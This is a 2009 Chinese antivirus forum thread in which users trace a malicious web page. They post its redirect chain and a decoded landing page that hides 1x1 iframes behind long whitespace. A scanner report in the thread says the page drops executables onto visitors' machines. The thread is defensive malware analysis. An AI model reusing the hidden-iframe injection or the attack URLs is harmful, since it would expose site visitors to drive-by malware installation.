查看: 1942|回复: 6
收起左侧

[其它] http://papampam.net/[挂马]

[复制链接]
qianwenxiang
发表于 2009-1-3 17:40:33 | 显示全部楼层 |阅读模式
time's up

网址:
[hxxp://papampam.net/in.cgi?pipka2]


关于:hxxp://papampam.net/in.cgi?pipka2解密的日志(全体输出-  5):

Level 0>http://papampam.net/in.cgi?pipka2
Level 1>http://dornaboret.com/cache/index.php
Level 1>http://portulote.com/cache/index.php
Level 2>http://portulote.com/cache/load.php
Level 2>http://portulote.com/cache/getfile.php?f=pdf

日志由 Redoce1.6第14次修正版于 2009-1-3 18:43:37 生成。
凝逸反毒
发表于 2009-1-3 17:49:08 | 显示全部楼层
http://papampam.net/in.cgi?pipka2

<iframe frameborder="off" src="http://portulote.com/cache/index.php" width=1 height=1 ></iframe>

<iframe frameborder="off" src="http://dornaboret.com/cache/index.php" width=1 height=1 ></iframe>

评分

参与人数 1经验 +4 收起 理由
qianwenxiang + 4 第一步+4~

查看全部评分

凝逸反毒
发表于 2009-1-3 17:49:38 | 显示全部楼层
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
</body></html>
凝逸反毒
发表于 2009-1-3 17:49:54 | 显示全部楼层
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
        <title>Please wate, page load....</title>
</head>

<body bgcolor="#E0E0E0">                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                <iframe frameborder="off" src="http://portulote.com/cache/index.php" width=1 height=1 ></iframe>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                <iframe frameborder="off" src="http://dornaboret.com/cache/index.php" width=1 height=1 ></iframe>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       
<br><br><br>




</body>
</html>
凝逸反毒
发表于 2009-1-3 17:50:26 | 显示全部楼层
没东东出来
floozy
发表于 2009-1-3 18:36:55 | 显示全部楼层
对于网页,我觉得在虚拟机里,用fiddler分析是最简单有效的
hzqedison
发表于 2009-1-3 18:48:18 | 显示全部楼层
Status Severity URL Created On Scanned On Scan Duration
75 http://papampam.net/in.cgi?pipka2  Jan 3rd, 2009 - 18:46 Jan 3rd, 2009 - 18:46 11 seconds
   Suspicious Link    http://dornaboret.com/cache/index.php
   Suspicious Link    http://portulote.com/cache/index.php
   Malware Injection    Link Target http://portulote.com/cache/load.php
injects
(IE-TEMP)/file[1].exe into the user's filesystem.
   Malware Injection    Link Target http://portulote.com/cache/load.php
injects
(DESKTOP)/vasdrvwin.exe into the user's filesystem.
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 08:31 , Processed in 0.127225 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表